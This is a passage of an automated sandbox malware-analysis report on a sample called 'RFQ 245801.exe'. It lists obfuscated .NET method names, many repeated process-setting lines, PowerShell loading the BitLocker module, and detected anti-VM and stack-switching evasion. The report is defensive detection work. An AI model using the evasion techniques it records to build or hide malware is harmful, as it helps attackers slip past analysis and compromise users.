          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, fJLFWsoNNh2D9wwqVh.csHigh entropy of concatenated method names: 'NIvMFtZOeP', 'FxXMJwU146', 'gAlM7RpRc8', 'PPoMiFRBjO', 'PGJM2sVfWo', 'B8PMBwZDAt', 'UGSMaV5HJi', 'ssCMbsnkWY', 'dUrMux6nZu', 'Yj8MV7rBGX'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, Pp6KbidXG6NYFVhHii.csHigh entropy of concatenated method names: 'GDQfl9x7FM', 'Lkrfgj1lW6', 'alRXo0ep98', 'HnVXkYJLBT', 'M1hfelj4C3', 'r9NfRsOyFL', 'CADfQnDchs', 'gXFfmp6CTe', 'sgtfIWv1Cc', 'JW5fc9WNmx'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, ykvgwsy2sp0Dxo7e19.csHigh entropy of concatenated method names: 'h0mpmK4BW4', 'L29pIYQFC2', 'T3ypcR7c1J', 'WtjpPEZdrd', 'jBxpTpIhqp', 'BgmpYIncW2', 'lakpWf8DED', 'xvhpl6RqgY', 'Mh0psWVFxE', 'MxEpgugcFR'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, aSTAvhByNgibKQ2Fu5.csHigh entropy of concatenated method names: 'ensjiojMtT', 'OCbjB32da8', 'Hq0jb23GJk', 'ot0juUJsuF', 'C40jK2yF1B', 'P5jjn6AD0b', 'z7ejfu7Pq7', 'pgljXSLuZo', 'Xv7jA7spA0', 'VDZjSv2e3Q'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, evvAxakZCXhQan771b.csHigh entropy of concatenated method names: 'aIk54VadLJ', 'Nbf5FjKw2t', 'RfX57YrIuA', 'mpp5i3MNfy', 'lno5BT7OIy', 't4n5acvJ2d', 'g7R5ua68Be', 'AlQ5VPS99b', 'kDtBkR8uAVrZKHOY2Id', 'GpEC038ZD19lmOGhD9y'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.csHigh entropy of concatenated method names: 'puuD1Nwm8k', 'WpHD8aBqTC', 'hyBDpnN38A', 'SbZDjD26aV', 'tM9DGV4vix', 'UfxD5ZDZlq', 'AmdDMBwBBs', 'GcVDx6k9Zj', 'QqeDNcu62U', 'autDEPkuYU'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, wIPVxezBCi6yaK1kDK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LcIAqNUlOE', 'zBxAKH4HpO', 'gsvAnKF9Mn', 'CO1Afyw5KG', 'Xj3AXDoIV6', 'E6jAArOjW2', 'AbSASMQIUG'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, Vj1PsPUkKgHXmyWVAr.csHigh entropy of concatenated method names: 'BawXwvSkbc', 'ih9X0FXu8r', 'MYOX3LV9cK', 'Hv0XLo72cx', 'qW1Xm4gn28', 'PohXtX2TN7', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, cR2wkeeEmUg7K1hb5P.csHigh entropy of concatenated method names: 'FCMKv4lKoN', 'MNgKR96FkT', 'NbgKmpTRG2', 'q9aKIMJtVF', 'leFK0i1gBY', 'l1eK3DrWLC', 'IPbKLXXxrK', 'NUiKtLrNHM', 'tg7K6U86V8', 'rjNKrg6AQb'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, JX4i456yo2MKdam2oZ.csHigh entropy of concatenated method names: 'OUp51orFpZ', 'p2y5pnUJm3', 'Utf5G8m17e', 'CMY5MFhInp', 'y7A5xQCsAS', 'YbZGTExH0a', 'zy6GYJvG5T', 'yGQGWEC9Es', 'xVVGl35cyR', 'wt8GsOoNO7'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, QocsAcjbV9qKLZWBRE.csHigh entropy of concatenated method names: 'Dispose', 'dBYksuBA4K', 'QJ990SyyKW', 'h0xyywG70G', 'co5kgiMbkc', 'N9pkz0G8J7', 'ProcessDialogKey', 'aAF9oriXPN', 'NLY9kKdbmC', 'pKE9930rop'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, R6B0AfnmHiIFCScC9n.csHigh entropy of concatenated method names: 'qpyqb2KokD', 'D9cquH8ibZ', 'JM0qwlYFq0', 'N81q0BAd8g', 'NSQqLPa1LM', 'gOQqtoT16X', 'vkBqrQGOE7', 'i73qhl9v7d', 'z0jqvYH8EV', 'vfLqeQ9Ju4'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, gj4fiq0cbqS67yHNi8.csHigh entropy of concatenated method names: 'FFJX8bUwFZ', 'KjWXpTNfWP', 'Pe1XjOjOmA', 'ynMXGulk6v', 'W7VX5hcGlQ', 'SmIXMp79sm', 'TSIXxoeoNp', 'ySuXN4Iv1E', 'QKDXE1uiIC', 'ySyXdfqKBw'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, BtID8LccH7jVfw8BjuT.csHigh entropy of concatenated method names: 'ToString', 'kakSDgaZVr', 'CepSHrSoui', 'JJRS1Olgiu', 'fhYS85fMWI', 'J2jSpIvDP4', 'MQaSjTY9Qu', 'pw6SGks02G', 'xQOLxWFKfC6n3r966wl', 'xjBLoAFjco7dYnTLoEh'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, AWHXGwJvdG0koSWdHq.csHigh entropy of concatenated method names: 'hLbAkYSVsD', 'ECLADBxr0X', 'jOoAH9fKyk', 'FHyA8HHOCJ', 'dLUApwRvFv', 't5WAGyaeSw', 'SmQA5jZAr9', 'l1LXWxhQnD', 'bQJXlnAfcN', 'NV8Xs3JRTB'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, jou9lSc2pb66G6VFaAF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IgESmlorLN', 'huqSIAl9rd', 'rGrScfC6bb', 'jbXSP1v4BH', 'dUfSTlXA53', 'DIjSYW6ZPj', 'zyiSWIcUeQ'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, EOWlqHciZCVwJpnRUia.csHigh entropy of concatenated method names: 'lCeAFxrg5Q', 'yq9AJfgBpr', 'gxpA7cv29g', 'OgaAi8lo5U', 'xcCA2ExvA3', 'qSeABp98hR', 'LZwAaKqk5A', 'FaEAbbqqob', 'oIuAukOBQo', 'OCrAV6PB7S'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, eXGkH9PtNjZJJbc2dM.csHigh entropy of concatenated method names: 'Em6kMFoAPf', 'D61kxAfQRw', 'sPTkEmcsg9', 'i8Mkdnesh8', 'tvdkKTUhoV', 'OuOknGTlgA', 'LLnhmds5VmAinjOmDO', 'SWnWoMU5KNBUdliNpB', 'fYokkOfZnt', 'ej8kDCydEd'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, Y5N6j8ZlrgTP7fUCew.csHigh entropy of concatenated method names: 'E7LM8IywVu', 'DteMj1sF8F', 'esDM5AUOi5', 'U7e5gYkNob', 'Jxk5zBx8p2', 'FHnMowkt8I', 'WjCMkL3STR', 'HSGM9kdSGy', 'nYEMDVt4r5', 'b8MMHS0PFs'

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: RFQ 245801.exe PID: 6716, type: MEMORYSTR
          Switches to a custom stack to bypass stack traces
